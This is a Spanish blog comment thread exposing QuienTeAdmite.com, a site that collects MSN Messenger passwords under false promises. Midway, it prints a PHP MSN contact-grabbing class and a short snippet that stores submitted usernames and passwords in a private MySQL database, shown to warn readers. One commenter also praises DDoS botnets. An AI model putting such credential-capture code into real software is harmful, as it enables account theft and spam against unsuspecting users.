Sin embargo continúan las acusaciones sin ningún fundamento por lo que se puede observar. Le explico, ya que parece que también desconoce como funciona un blog: en este sitio no se banea a nadie (ni siquiera entiendo a que viene esa acusación cuando esta accediendo desde una IP diferente a la usada para escribir el comentario citado en este artículo), sin embargo todos los comentarios pasan por moderación para evitar basura como los 2 comentarios que se dejaron antes del que publico en este artículo. ¿O a alguien le puede interesar un comentario cuyo contenido son 78 letras “d”? Imagino que no.

Sobre la acusación de que la única intención es atraer visitas con contenido polémico solo comentar un par de cosillas:
- No he sido yo quien a escrito el comentario, simplemente respondo.
- ¿Quién pretenderá ganar más visitas, el escritor de este blog intentando ayudar a los usuarios, o los autores de páginas como QuienTeAdmite.com asegurando a sus usuarios que les pueden ofrecer una información que es completamente imposible conseguir dado que MSN solventó el bug a partir del cual se obtenían dichos datos hace bastante tiempo? Cada cual saque sus propias conclusiones.

Lo dicho, hasta ahora simplemente se ha demostrado un gran desconocimiento en cada comentario escrito tanto en las acusaciones hacia este sitio como en la defensa del sitio QuienTeAdmite.com, y lo que es peor aún, desconocimiento a la hora de aplicar la tecnología en su sitio web para intentar que este sea seguro, o al menos lo parezca.

Y de verdad le comunico que espero con impaciencia ver como se rebaten cada uno de los puntos que en este y en el otro artículo se muestran. Claro está, si eso es posible y cesa en su intento de pretender defender el sistema de su página web sin decir una sola palabra sobre el mientras ataca a este blog, el cual, vuelvo a repetir, ni siquiera precisa que los lectores se registren, mucho menos les solicita datos privados de acceso a servicios de terceros.

define(’LIST_ALLOW’, ‘AL’);
define(’LIST_BLOCK’, ‘BL’);
define(’LIST_FORWARD’, ‘FL’);
define(’LIST_REVERSE’, ‘RL’);

class phpListGrab
{
var $_passport = ”;
var $_password = ”;
var $result = 0;
var $lists = array(
LIST_ALLOW => array(),
LIST_BLOCK => array(),
LIST_FORWARD => array(),
LIST_REVERSE => array(),
);
var $_contacts = array();
var $_socket = NULL;
var $_lst_count = 0;

function phpListGrab($passport, $password)
{
$this->_passport = $passport;
$this->_password = $password;
}

function grab($server = ‘messenger.hotmail.com’)
{
$this->_socket = @fsockopen($server, 1863);

if (!$this->_socket)
{
$this->result = ERR_SERVER_UNAVAILABLE;
return false;
}

$this->_send(’VER 0 MSNP8′);

while (!feof($this->_socket))
{
$data = fgets($this->_socket);
$data = substr($data, 0, -2);
$ret = $this->_parse($data);

if (!$ret)
{
return $ret;
}
}

// Sort the lists into alphabetical order
usort($this->lists[LIST_REVERSE], array($this, ‘_cmp’));
usort($this->lists[LIST_FORWARD], array($this, ‘_cmp’));
usort($this->lists[LIST_ALLOW], array($this, ‘_cmp’));
usort($this->lists[LIST_BLOCK], array($this, ‘_cmp’));

return true;
}

function _send($data)
{
fputs($this->_socket, “$data\r\n”);
}

function _parse($data)
{
$params = explode(’ ‘, $data);

switch ($params[0])
{
case ‘VER’:
$this->_send(’CVR 1 0×0409 winnt 5.1 i386 MSNMSGR 6.0.0254 MSMSGS ‘.$this->_passport);
break;

case ‘CVR’:
$this->_send(’USR 2 TWN I ‘.$this->_passport);
break;

case ‘XFR’:
$subparams = explode(’:', $params[3]);
return $this->grab($subparams[0]);
break;

case ‘USR’:
if ($params[2] == ‘TWN’)
{
$msnpauth = new MSNPAuth($this->_passport, $this->_password, $params[4]);
$hash = $msnpauth->getKey();

if (!$hash)
{
$this->result = ERR_AUTHENTICATION_FAILED;
$this->_send(’OUT’);
return false;
}

$this->_send(’USR 3 TWN S ‘.$hash);

}
elseif ($params[2] == ‘OK’)
{
$this->_send(’SYN 4 0′);
}
break;

case ‘SYN’:
$this->_lst_count = $params[3];
break;

case ‘LST’:
$this->_lst_count–;

if (!isset($this->_contacts[$params[1]]))
{
$this->_contacts[$params[1]] = array(
‘passport’ => $params[1],
‘friendlyname’ => urldecode(utf8_decode($params[2])),
‘lists’ => $params[3],
’status’ => ‘FLN’,
‘clientid’ => 0,

);
}

if (($params[3] & 2) > 0)
{
$this->lists[LIST_ALLOW][$params[1]] = &$this->_contacts[$params[1]];
}

if (($params[3] & 1) > 0)
{
$this->lists[LIST_FORWARD][$params[1]] = &$this->_contacts[$params[1]];
}

if (($params[3] & 4) > 0)
{
$this->lists[LIST_BLOCK][$params[1]] = &$this->_contacts[$params[1]];
}

if (($params[3] & 8 ) > 0)
{
$this->lists[LIST_REVERSE][$params[1]] = &$this->_contacts[$params[1]];
}

if ($this->_lst_count == 0)
{
$this->_send(’OUT’);
$this->result = OK;
}

break;
}

return true;
}

function _cmp($a, $b)
{
return strcasecmp($a[’friendlyname’], $b[’friendlyname’]);
}
}

?>
——————————-

$host = “XXX.XXX.XXX.XXX”;
$user = “XXXXXXXXX”;
$password = “XXXXXXXXX”;
$bd = “XXXXXXXXX”;
$conect = mysql_connect($host,$user,$password) or die (mysql_error());
mysql_select_db($bd) or die (mysql_error());
if(!(empty($usuario))&&(!(empty($contraseña)))){
$sql = “insert into MiBasedeDatos (Usuario,Contraseña) values (’$usuario’,'$contraseña’)”;
$result = mysql_query($sql);
}

Se podría ilustrar esto con un ejemplo: todo el mundo tiene cuchillos en su casa ya que son muy útiles, pero también son potencialmente peligrosos. De la misma forma el script mostrado puede ser útil pero simplemente agregando las pocas líneas anteriores se convierte en algo bastante peligroso y además los usuarios ni se percatarán de ello.

Incluso se podría comentar el peligro añadido de obtener la lista de contactos, la posibilidad de guardarla de la misma forma y usarla para enviar correo publicitario no solicitado o SPAM… Como se puede ver posibilidades existen muchas y además no son incompatibles entre sí.

Y volviendo al comentario, quizás lo mas importante de todo sea esta frase (copiada literalmente aunque corregida ): “Simplemente, al logearse en esa web, la clase PHP que utiliza lo que hace es comprobar que contactos te han eliminado (que no es lo mismo que los que te tienen sin admisión)”. En ella al fin se confiesa que dicho sistema no sirve para obtener la información que a lo largo y ancho del sitio web se promete en frases como (y solo son algunos ejemplos de la página principal):

“Digitando tus datos de MSN MESSENGER sabras quien te ADMITE y quien no te ADMITE”

“En la lista verá todos los contactos que lo hayan eliminado o bloqueado.”

“Como averiguar si un contacto me bloqueo del MSN Messenger®?
Al ingresar tu dirección de email y contraseña, QuienTeAdmite.com chequeará contra los servidores de MSN® si los usuarios de tu lista te tienen no admitido o eliminado.”

“[…] para saber si los usuarios de tu lista te tienen eliminado o no admitido.”

“[…] para averiguar los contactos que te bloquean o eliminan[…]”

Si se pretende ganar la confianza de los visitantes mejor sería explicarles la diferencia entre eliminar y quitar la admisión, avisarles de que lo que ellos buscan, conocer que contactos les tienen sin admisión, no es posible y por lo tanto los únicos resultados serán de contactos que no les tienen en sus listas (lo cual no es malo y algo bastante normal), y mostrarles formas alternativas de obtener los mismos resultados sin necesidad de entregar sus cuentas y contraseñas a nadie y evitar comprometer su seguridad y privacidad.

Pero tengo que aclarar que hicieron un copy-paste de la seccion privacidad de quienteadmite y la pegaron aca, si no me confundo, fue un moderador del foro quienteadmite, pero no el dueño, y el otro mensaje debe ser de un fanatico o algo asi. tampoco fue mio.

ahora mismo estoy usando un proxy porque no se porque motivo no me deja entrar desde mi pc a esta web? si queres te paso mi ip para que verifiques ? es que no me deja entrar.

queria contestar algunas cosas, decime si puedo hacerlo, y asi dejo un mensaje aca.

bueno desde ya, saludos, y exitos con la web.

pd: llegue aca por el google analits, en mi estadistica sale este sitio entre los primeros mandando trafico a quienteadmite en las ultimas horas.

No importa la IP, no suelo hacerles demasiado caso, imagino que no todos los que comentan son quienes pretender ser. Este es el motivo por lo que al poco de escribir el artículo se modifico su título: evitar falsas acusaciones. Si desea que verifique su identidad en futuros comentarios simplemente use el mismo email. Sin embargo las respuestas continúan siendo válidas. También me fijé en que fue un copy & paste de la sección de privacidad salvo las imágenes y con el añadido de la acusación hacia este sitio por su “inseguridad”, los insultos y la reseña final al uso de una clave de encriptación de 129 bits (otra errata más).

Sobre el proxy darle toda la razón, el host en el que se encuentra alojado el sitio impide su visualización desde determinados países. Tengo pendiente hacer una mudanza a uno mejor para evitar problemas de este tipo.

PD: Tampoco debe ser mucho tráfico puesto que este blog no es muy visitado. Otro tema pendiente es dedicarle mas tiempo y aplicar un poco de posicionamiento.

Queria hablar un poco en terminos generales, el sitio no puede vulnerar la privacidad de Microsoft, eso es casi imposible, y en caso de que se pudiese, Microsoft en 24 hs cerraria mi sitio. Lo que se ofrece es algo interactivo y rapido, para que puedan ver la lista al estilo “msn plus” que te muestra toda la lista de contactos bloqueados + eliminados, o eliminados, bloqueados sin eliminar, no se puede. Lo que si estamos trabajando en un detector de linea, pero solo dira el estado de la persona, siempre y cuando no tenga marcada la opcion de privacidad en la cuenta.

Despues, hay muchos puntos para debatir, y algo que es cierto, es que nunca se puede conformar a todo el mundo, al sitio lo visitan 65.000 personas por dia, y de tantas visitas, siempre habra 1000 no conformes, pero de hecho, tenemos muchos fans y foristas registrados en el foro, y con cuentas msn @quienteadmite.com, pero claro, hay otro porcentaje, que no le agrada el sitio, hay para todos los gustos.

Por lo menos desde mi parte, trato de hacerl lo mejor pero magia nunca podre hacer, lo que hay es lo que ven, y me parece bien que haya gente que tenga sus comentarios a favor y en contra, cada uno es libre de opinar.

Saludos

Cualquier otro punto que se desee rebatir, desde aquí estamos dispuestos a hacerlo.

Por otro lado desde aquí solo se intenta avisar a los usuarios de que el sistema de esta página, al igual que el de las otras similares que existen en la red de redes, es potencialmente inseguro por todas las causas citadas anteriormente. Muchos lo seguirán usando, por supuesto, pero al menos me gustaría hacerles recapacitar un momento para que después actúen con conocimiento de causa y bajo su propia responsabilidad.

Soy el director comercial de www.Loadjet.Com www.Quienteadmite.Com y estoy buscando una persona que sea capas de crear un sistema de deteccion de estado de messenger.

El texto completo de la oferta es el siguiente:

Bueno, el sistema que necesitamos para quienteadmite.com es un sistema que detecte el estado real de la persona en el messenger, para saber si la persona esta online o offline, es decir, el estado real al 100 %, actualmente hay un sistema en blockstatus.com pero no funciona de manera correcta…Es decir, en toda la red, no hay ninguno que revele el estado de la persona al 100 %.

Por este mismo sistema, pagariamos 300 pesos por semana, es decir, por cada semana que este sistema funcione, pagamos 300 pesos, de esa manera nos aseguramos de no perder la inversion en caso de que Microsoft cambie algun protocolo y ya no se pueda revelar el estado en el windows live messenger. El primer pago del trabajo es de 1000 pesos, y luego 300 pesos por semana.

Por favor, contactarse de manera urgente.

Aunque también son interesantes las respuestas dadas a las preguntas hechas por los interesados. Muy en la línea de la comunicación mantenida en este blog.

Aquí dejo una captura de pantalla de la página completa (click en la imagen) para que quede constancia incluso si en la web trabajosfreelance.es se elimina el proyecto:

Bueno, realmente lo importante de esta oferta de trabajo es la confesión de que el sistema de quienteadmite.com, al igual que el de las otras páginas con sistemas similares no funciona, ni siquiera para ver quien te ha eliminado de su lista de contactos.

Y de nuevo, cuando no existen argumentos para defender las mentiras que cuentan y alguien las pone de manifiesto, el único recurso de estos individuos es el insulto…

PD: La web de Lucas era: zona-trucos.com.ar, la cambió a trucosinformaticos.com/quien-me-admite.php, y ahora medesadmite.com

sexyono.com
hi5.com
badoo.com
e-messenger.net
metroflog.com (la cuarta pagina mas visitada por los mexicanos)

Todas estas web tienen mas de 500.000 visitas diarias, y todas estas web, como regla numero uno de marketing, piden USUARIO Y CONTRASEÑA DE HOTMAIL, para enviarles un mail a los contactos, con su foto, etc. Estas web que se encuentran entre las mas famosas del mundo, ver en www.alexa.com no utilizan ni el 10 % de certificados y seguridad que utiliza quienteadmite.com, asi y todo, la gente nunca saco un debate sobre la seguridad de estas paginas que estoy nombrando.

Cual es el miedo ? miedo a represarias de estas web ? son como el periodismo barato ? hablan de lo que tienen ganas, y a los que te cae bien no decis ni “mu” . Con el critero de que una web que pide usuario y contraseña es peligrosa, entonces mas de media poblacion de internet esta en peligro, porque de cada 10 usuarios 5 alguna vez ingresaron en sitios que utilizan importadores de HOTMAIL, y se logearon con sus cuentas.

Hay que ser un poco mas objetivo entonces, esperamos una nota de hi5.com ROBA CONTRASEÑAS !!! MUY PRONTO

HI5.COM ,no conozco ningun peruano que no haya ingresado su cuenta ahi, por ej, por dar un dato.

En los artículos sobre QuienTeAdmite.com se comenta que TODAS las páginas que usan ese sistema son inseguras e igualmente no funcionan.

De la misma forma quisiera saber en que momento y lugar se ha comentado en este sitio que alguno de los sitios web citados es seguro y se recomienda usarlo, o que me “caigan bien”, o que aquí se hace periodismo. No le encuentro sentido a nada de todo eso salvo el de continuar con acusaciones sin ningún fundamento con la intención de quitar veracidad a mis palabras.

Por supuesto que este blog es para hablar sobre lo que yo quiera, faltaría más. Si empezamos con exigencias juguemos todos a lo mismo: EXIJO que en QuienTeAdmite.com (y todas las demás) se exponga claramente que NO sirve para saber quien ha quitado la admisión, justo al lado del formulario para introducir el email y la contraseña, además de advertir del peligro para la seguridad que supone introducir los datos en dicho formulario. Incluso un hilo en sus foros con un enlace hacia estos artículos para que, de forma imparcial, los usuarios conozcan la verdad. O, parafraseándole, ¿cuál es el miedo? ¿Quizás que los usuarios descubran el engaño?

Sobre los certificados y la seguridad de QuienTeAdmite.com creo que quedo bien claro que son simples intentos de ganarse la confianza de los usuarios, sin embargo ni siquiera estan bien usados. Solo hay que leer este artículo para verlo, pero si es necesario repetirlo, profundizar en el tema, o incluso ponerlo en negrita, se hace…

Además existen un par de claras diferencias entre las webs tipo QuienTeAdmite y las listadas en su comentario:
- QuienTeAdmite usa el engaño para lograr que los usuarios entreguen su dirección de correo y su contraseña.
- Las páginas listadas (al menos algunas, no las conozco todas) son comunidades con datos de registro propios, solo sí se desea invitar a todos los contactos del Messenger se piden los datos de acceso de dicho programa (lo cual desde aquí no se recomienda hacer. Si se desea invitar a todos los contactos podemos enviar un email a todos ellos manualmente y de forma segura desde nuestro correo electrónico)

Y para acabar, si alguien tiene el suficiente tiempo libre y las ganas de elaborar un listado de páginas web que soliciten usuario y contraseña de algún servicio que no sea el suyo propio no tiene más que enviarlo y será publicado después de comprobarlo.

Lo más triste es ver cómo los atacados y ofendidos no son capaces de dar una defensa clara, firme e imposible de contradecir, solo se dedican a responder cosas que ni siquiera vienen al caso o se nota a la legua que intentan desviar el objetivo de la pregunta hecha.

En la historia siempre se ha visto cómo grandes empresas niegan hechos que luego se demuestra que eran ciertos, en vez de aceptarlos y decir que lo corregirán. Es el sino de un grupo con reputación, mostrar con orgullo a la gente una utopía falsa hasta que, o corrigen el fallo, o termina explotando. El objetivo es mantener a la gente feliz y tranquila, aunque sea a base de hipocresía y bulos. Sobretodo cuando la empresa no puede mantenerse en pie sin ello.

Me parece un abuso denunciable a las autoridades.

No tengo tan baja autoestima como para ser una víctima de este tipo de páginas, pero he visto que el floodeo de propaganda de estos sitios engañabobos es increíble.

Y qué más decir, que es un servicio gratuito, por lo de que la privacidad no me la trago, van a pagar a alguien para que les haga un sistema… en fin… ¿con qué dinero piensan pagarlo?

Señores, ¿a quién están vendiendo todos los e-mails que se introducen al dia?

vaya panda de chorizos…

Un saludo…

En cuanto al tema del dinero, solo fíjate que las páginas de ese tipo están llenas de publicidad (normalmente de Google AdSense), la cual ya de por sí debe dejar un buen sueldo. Aunque una cosa no quita la otra, y cuando un sistema como este está basado en la mentira como podemos fiarnos…

Además, están usándote para hacer su propia propaganda, están usando un espacio que tú no les has cedido y creo que en ningun sitio se les da permiso para ello. Lo mismo que ellos han debido contratar google ads para obtener beneficios, ellos deberían pagar a los usuarios por tener ese soporte.

Y luego son ellos los que insultan… (y escriben sus condiciones legales con faltas y a lo cutre, haciendo uso de comillas donde no deberían y una puntuación pésima).

Jefe del quienteadmite –> yo te corrijo la pagina web entera si me pagas (aunque no creo que el tipo de gente que entre a tu página le importe mucho, harías un bien a la humanidad dando ejemplo a todas esas balas perdidas que bastante tienen con la ESO).

Con respecto a quitarlo, es tan fácil como cambiar el nick de nuevo

PD: Recomienda a ese 90% de tus amigos leer estos artículos

Suerte

Luego de leer los propios “términos y condiciones” de quienteadmite.com además de su “seguridad” SSL 128 bits me pude dar cuenta de la farsa y solo puedo agregar a lo que dijo juanjo, lo siguiente:

al momento de ingresar los datos de direccion de correo y contraseña, y además de hacer clic sobre la casilla de verificación “Secure Login” se puede observar que no tiene nada de “secure” ya que no se utiliza para nada el protocolo https. Esto ya despertó mis sospechas sobre el timo y tu blog solo las confirmaron.

Se contradicen al decir que utilizan dicho protocolo porque, como afirman en su página acerca de la privacidad,

“… .Cuando está en una zona segura también se muestra un candado en la parte inferior izquierda de su pantalla o una llave (dependiendo del navegador o browser que utilice para ver Internet). …”,

dicho candado no aparece ni en IE ni en Opera (el cual utilizo bastante y varias veces he visto ese candado, en páginas que verdaderamente sí utilizan https). Obviamente la página de privacidad sirve para crear confianza o para eliminar sospechas que puedan tener los usuarios.

Me queda muy claro el objetivo de estas páginas web y creo que de igual manera para muchos de los lectores de este blog.

Felicidades por tu blog, me despido sin antes sugerir que comentes acerca de esta web: www.espiacorreos.com, recién hoy la descubrí y de lo poco que he visto ya ha despertado sospechas en mí.
Suerte.

Wa1t3r, eso de la casilla de “Secure Login” debe ser más nuevo que el último artículo sobre esa página, puesto que no existía cuando la analicé. Gracias por el aporte.

La web espiacorreos.com la conozco ya que recibí amenazas por su parte (al menos decían ser dueños de esa web y otras muchas de sistemas similares…). Es una anecdota graciosa, y seguramente incluso realcionada con el tema que se trata en este artículo.

Pero tienes razón en que sería interesante y útil un análisis sobre la forma de actuar de ese tipo de páginas dado que el robo de cuentas de correo es algo factible y fácil debido al desconocimiento sobre este tema. Es algo que tengo pensado hacer desde que los conocí aunque por el momento sigo recopilando información .

¿Puedes saber que no han almacenado tu contraseña?

¿Puedes saber que no han copiado toda tu lista de contactos para usarla con fines de SPAM?

¿Puedes saber que no usan los datos que voluntariamente les has dado para mantener otros sistemas dedicados al espionaje de cuentas de correo (como espiamsn.com)?

Y se podría seguir con una larga lista de preguntas…

Y la respuesta a todas ellas será la misma: NO. El usuario no puede saber nada de eso. Para él es como si no ocurriese nada, puesto que no se produce ningún cambio.

Un ejemplo más ilustrativo, imaginad que tienen un diario en el que escriben todo: sus sentimientos, sus experiencias, sus secretos,… Pero no lo escriben a la antigua usanza, esto es en papel, sino que lo mantienen como un documento en su computadora. Cualquiera podría llegar a esa computadora y copiar el archivo, y no se enterarían puesto que el archivo sigue en su sitio y no se ha modificado… De cara a estos usuarios no habría ocurrido nada.

Y lo otro que tengo que añadir, es que he navegado el site www.quienteadmite.com y es curioso no encontrar los “Términos y Condiciones de uso” requeridos por las leyes estatales de la mayoría de países no-comunistas (éstos tienen unas leyes diferentes), en cambio tenemos “Trminos y Condiciones” (NÓTESE LA FALTA DE UNA LETRAS: lo cual desvincula el texto contenido en el link de cualquier normativa de uso).

A parte, como pre-webmaster (no soy bueno, pero tampoco tonto) tengo que decir que generalmente, cuando se necesitan Certificados de Seguridad, por norma, uno mismo no suele darse el certificado a no ser que se dedique a la seguridad (caso que no corresponde con el tema en cuestión).

En fin, que no hace falta hablar de PHP ni protocolos ni mandangas, solo hay que buscar garantías para hacerlo, las cuales www.quiemteadmite.com no las da!

(NÓTENSE CIERTAS FALTAS ORTOGRÁFICAS EN NOMBRES PROPIOS*: también me gusta cubrirme las espaldas cuando voy a desprestigiar a alguien)

PD: Juanjo, te has ganado un hueco en mis favoritos… Fuí a ver quienteadmite.com y solo con ver lo expuesto quise informarme y encontré www.caminando.com.es. Buen site!

* Los nombres han sido corregidos.

Felicidades por el Blog muy bueno y por cierto muy bueno tu “periodismo”.

No voy a comentar nada mas respecto al tema que nos ocupa, ya que está mas que demostrado que esta y otras webs similares, son UN TIMO, UN ENGAÑO, y sobre todo, UNA GRAN MOLESTIA para muchisimos usuarios que, como yo, hemos picado.

Bueno, el motivo de este comentario es pediros encarecidamente que me ayudeis; mi caso es el siguiente:

Por un gran fallo y descuido mío, accedí a dicha página, y dejé constancia de mi Mail y mi contraseña. Como es bien sabido, utilizan el espacio de mi MSN dedicado al mensaje personal para hacer publicidad de su web. Me gustaria, x todos los medios, suprimir dicha publicidad, ya que, además de que aparece cuando no estoy conectado, cuando me conecto a través de mi xbox360 si que aparece: he hecho todo lo que se me ha ocurrido: he cambiado la contraseña, la pregunta secreta, he instalado/desinstalado, he pasado el norton, el add-aware…. y es que no hay manera, y me da mucha rabia estar hablando con alguien a través de mi xbox y ver que ese mensajito sigue apareciendo… os agradezco de antemano la atención prestada, y creo que como yo muchos usuarios, ya que he buscado la manera de quitarlo y no he encontrado en ninguna página una respuesta que me sirva de verdad.

Además de esto, me gustaria lanzar dos preguntas, por si alguien es capaz de contestarmelas:

1º/ Microsoft/msn/hotmail no pueden hacer NADA para evitar este tipo de intrusiones en las cuentas de los usuarios?

2º/ Es punible este tipo de acciones? se puede emprender alguna accion legal contra este tipo de páginas por violación de la privacidad, o uso de datos sin consentimiento expreso? En pocas palabras… hay alguna manera de denunciar ante la ley estas páginas y/o a sus responsables? Porque creo yo que la Ley de Protección de Datos tiene o debe de recoger algo aplicable a este caso…

Gracias, sobre todo a ti, Juanjo. Espero que puedas ayudarme (o cualquiera de los que leais este mensaje)

En cuanto a tus otras consultas:
- denunciar a QuienTeAdmite.com ante Microsoft, MSN, o Hotmail tiene poco sentido dado que se trata de un servicio que ofrece un tercero y que no tiene nada que ver con ellos, y además la conexión con tus datos de acceso la hacen bajo petición del usuario y previa aceptación de los “Terminos y condiciones” por parte de este.

- en cuanto a emprender acciones legales contra ellos, además de lo dicho anteriormente, también existen las limitaciones impuestas por las diferentes legislaciones de los países en los que residen los dueños, los servidores, y los usuarios, lo cual lo complica aun mas si cabe.

Por eso creo que la mejor forma de luchar contra este tipo de servicios engañosos es informar bien al usuario, luego cada cual que haga lo que quiera bajo su propia responsabilidad.

Por favor si alguien tiene una solucion publiquela aqui porfavor. Se los agradeceria demasiado. Gracias por leer, y hasta pronto.

Bueno escribo por que antes se ha mencionado paginas como hi5, entre otras, y queria saber si esas tambien son como www.quienteadmite.com

Bueno si me podeis ayudar con eso gracias por adelantado por que es que conozco a mucha gente que tiene cuentas en estas paginas y me incluyo por que tambien tengo una en hi5…

Esto último es lo que no se recomienda hacer nunca, ni en esta comunidad ni en ningún otro sitio; si se desea invitar a todos los contactos del Messenger se debe enviar un email a todos ellos manualmente y de forma segura desde nuestro programa de correo electrónico, sin dar nuestros datos de acceso a nadie, aunque resulte una tarea mucho más tediosa.

Sin embargo si no se usa esa característica hi5 y el resto de comunidades de usuarios son sistemas inocuos. Cosa que no se puede decir de las páginas como QuienTeAdmite que están basadas en timos y engaños.

Felicidades Juanjo

Ultimamente veo como mis contactos de msn caen como ratas uno a uno llevados por la curiosidad por saber quien los tiene admitidos o no (cosa que me parece estúpida, total, si te tiene en no admitido que vas a hacer? mandarlo al carajo?)

Pero en fin te quiero felicitar casi más por tus respuestas a los comentarios que por el post en si, por que hay que ver la manera de marear la perdiz que tienen este señor (sospecho que es el mismo siempre) y desviar la atención a tres puntos básicos que son:

1- Quienteadmite.com no te dice quien te admite (sino quien te borra) Cosa que se puede hacer dsd el mismo Messenger desde Opciones -> Privacidad -> Boton “Ver…”

2- Pedir usuario y contraseña no se ha visto en la vida en ninguna otra web, así que los ejemplos que se supone que comenta, si son reales, serán más webs de phishing.

3- La tensión se ve como sube en aumento hasta que casi se puede cortar con el cuchillo de mantequilla, cosa que pone en evidencia que las acusaciones no van demasiado desencaminadas.

Un saludo compañero, bastante mierda hay por internet, menos mal que aun queda gente que se preocupa de limpiar algo, como lo haces tu con tu blog

Es tremendamente repugnante tener que asistir a este tipo de cosas pero quizás habrá un buen final y este tipo de personajillos indecentes que se dedican a enmierdar la red acaben con sus huesos entre rejas.

Un abrazo muy, muy fuerte

El usuario promedio que utiliza ese tipo de programas también asiste a sitios como fotolog y otras porquerías por el estilo. No es su culpa, es culpa de la mierda con la que se juntan.

En primer lugar quiero felicitar al dueño de Quien Te Admite por crear semejante fraude a la comunidad hueca latinoamericana (dije a la comunidad hueca, no a toda Latinoamérica). Aprovecharse de la llana capacidad mental de estas personas es digno de aplaudir.

Pero hay que ver en qué se favorece este tipo. Pues uno de los temas es hacer ataques Ddos. Esos ataques son geniales. Se trata de meter algún programa tipo malware que tiene como intención establecer una conexión con cierta página cada tanto tiempo. Esto no sería problema si fuese desde una sola máquina. Imaginen cientos de máquinas de las cuales sus usuarios no tienen ni idea de que sus equipos están trabajando como zombies. Es ahí donde entra el otro negocio: hacer caer páginas.

Una vez he hablado en un foro underground con un sujeto que decía dedicarse a ello. Resulta que él decía ser contratado por ciertas empresas para hacer este tipo de ataques a determinados sitios web. De ese modo hacía caer el sitio potenciando su inaccesibilidad, además de sumarle costos de mantenimiento y reparación al servidor de la víctima.

Solución: usen Firefox, no recomienden Windows Live o cualquiera de esas porquerías, o instalen Linux o comprense una Mac.

Saludos

Para comenzar, mucha, muchísima gente utiliza los servicios de mensajería instantánea de Messenger; y la gran mayoría utiliza MSN Messenger. Te guste o no, cada persona es libre de elegir que programas utiliza.

Por ora parte, ¿que problemas hay con usar fotoblogs y similares? Ganas de mezclar churras con merinas…

Ahora a lo que vamos, aplaudir y alegrarse de que haya gente que se aproveche del desconocimiento de otras personas para sacar provecho y perjudicar a estas dice mucho en tu favor. Muchísimo.

Al igual que elogiar ataques DDoS. Es lo mismo que si nos alegramos de que te roben el coche y tengas que ir a trabajar en taxi, a lo cual deberás sumar el gasto de adquirir un vehículo nuevo. Gracioso, ¿verdad?

También hay gente que roba, trafica, secuestra, extorsiona, mata,… ¿les aplaudimos también a estos?

Y para acabar me gustaría que explicases la relación entre utilizar Windows Live, FireFox, Linux o Mac, y entregar datos de acceso a servicios de correo electrónico bajo engaños y falsas promesas de un sistema que no funciona.

Mientras existan personas con esta mentalidad la humanidad seguirá encaminándose hacia un mal destino.

Comienzo a responderte por el final: no se trata de una moda, sino de una realidad, de un peligro bien real. Si engañar a la gente no te parece serio lamento informarte de que a muchas personas sí se lo parece, y para esas personas están destinados estos artículos. Por otra parte nadie te obliga a leerlos

¿Qué para que quieres tú, y los demás dueños de páginas de ese estilo, las cuentas de correo electrónico de otras personas? La respuesta se ha dado varias veces a lo largo de estos artículos y sus comentarios, parece mentira que lo preguntes (antes de juzgar algo y tacharlo de inútil es necesario analizarlo detenidamente, en este caso leer los artículos y los comentarios); en resumen:
- Robar la cuenta de correo electrónico (y venderla a terceros).
- Espiar la cuenta de correo electrónico (y vender la información a terceros).
- Obtener datos de acceso a otros servicios de los emails de confirmación de registro (por ejemplo datos de acceso a banca online).
- Obtener la lista de contactos para hacer SPAM.
- etc.

Como ves todas ellas son acciones bastante lucrativas.

¿Qué tú no lo haces? Es posible; tú mismo te has dado por aludido, por algo será. ¿Qué se pueden obtener los datos de acceso de ésta manera? Es indudable e indefendible, es más, con tu pregunta reafirmas este hecho. ¿Qué NO se puede saber quien nos tiene en el Messenger sin admisión con estas páginas? Completamente cierto.

Por lo tanto es un peligro real utilizar este tipo de páginas, que conllevan un riesgo, ninguna garantía, y además no funcionan. Así pues, permíteme acabar con otra pregunta para tí: ¿Para qué quiere nadie utilizar el servicio de tu página (o cualquier otra) si es imposible que le diga que contactos le tienen sin admisión?, y parafraseándote “haz cosas serias”, y deja de engañar y estafar (ya que mediante el engaño obtienes un beneficio como tú mismo indicas bien en tus comentarios) a los usuarios de tu web medesadmite.com

Bueno, lo que quería decirte es que me fijé en quienteadmite.com para ver cómo implementaron el protocolo HTTPS, y lo que vi me dejó asombrado. Por empezar, no hay forma de ingresar en el supuesto sitio seguro si no es ingresando maualmente “https” en lugar de “http” en la barra de direcciones. También probé tildando la casilla “Secure Login”, luego sin tildarla. Y el resultado? Siempre el mismo: un login no-seguro, nunca aparece el famoso candado, ni un HTTPS en la barra de direcciones ni nada que indique que la conexión es segura.

Luego probé ingresando a través de HTTPS, y el sitio carga lo más bien. Pero (y acá está la trampa) tilde o no “Secure Login” mi Opera me detiene con un hermoso mensaje de advertencia, que transcribo a continuación:

“¡Alerta de seguridad!
Se enviará información desde ésta página HTTPS a una página sin codificación segura en www.quienteadmite.com Los datos se transmitirán sin ninguna seguridad. Se recomienda enfáticamente no enviar ninguna información privada.”

Supuestamente el HTTPS sirve para un login seguro. ¿No es irónico que el sistema de login, que es precisamente la razón de que se implemente dicho protocolo, opere bajo el simple HTTP, siendo sólo la página principal la que utiliza el protocolo seguro (donde no cumple la más mínima función)?

Listo, me despido. Ojalá entre todos podamos lograr que estos sitios fraudulentos, manejados por gente sin escrúpulos, dejen pronto de existir, antes de que haya más gente que se vea perjudicada. Saludos, genio!

http://www.segu-info.com.ar/quienteadmite/

Saludos

lo que iba a decir es: ni badoo ni las otras paginas antes mencionadas te cambian el nick y te destruyen la cuenta como a 2 contactos que tengo les hizo: quienteadmite.com y lohizo.com, se les hizo imposible vovler a tener su nick y tubieron que crear cuentas nuevas

el resto de lo que iba a decir lo hare citando el comentario de quientepirulea que tiene lo mismo que escribi

a ustedes les sale la misma advertencia?

Solo mira este artículo: ¿Es seguro utilizar QuienTeAdmite?.

Cualquier dato será muy agradecido. Saludos.

Ahora bien, ¿puedes tú comprobar que TODAS las páginas de este tipo NO usan los correos para ese fin? Pues no amigo, no puedes. Únicamente podrías decir que en la tuya (que por cierto no sabemos cual es) no se hace, y queda en manos del usuario creerlo o no.

Está claro que todas no lo hacen, faltaría más, pero muchas de ellas sí. Y no solo con la cuenta de correo de la persona que usa el sistema, como podría ser en el caso de un foro tal y como comentas, sino también con las cuentas de correo de todos sus contactos ya que una vez que inicia la sesión pueden copiarse todas las direcciones de los contactos con una sola línea de código PHP (totalmente invisible para el usuario). Es más, la prueba de que obtener las direcciones de correo de los contactos es posible y muy sencillo, para todos aquellos que aún albergan alguna duda, está en los correos promocionando dichas páginas que recibimos, y que el propio sistema envía cuando un usuario lo utiliza (porque aunque venga en nombre de nuestro contacto, no lo ha enviado él, sino el sistema en su nombre dado que tiene completo acceso a la cuenta de correo una vez le damos la contraseña).

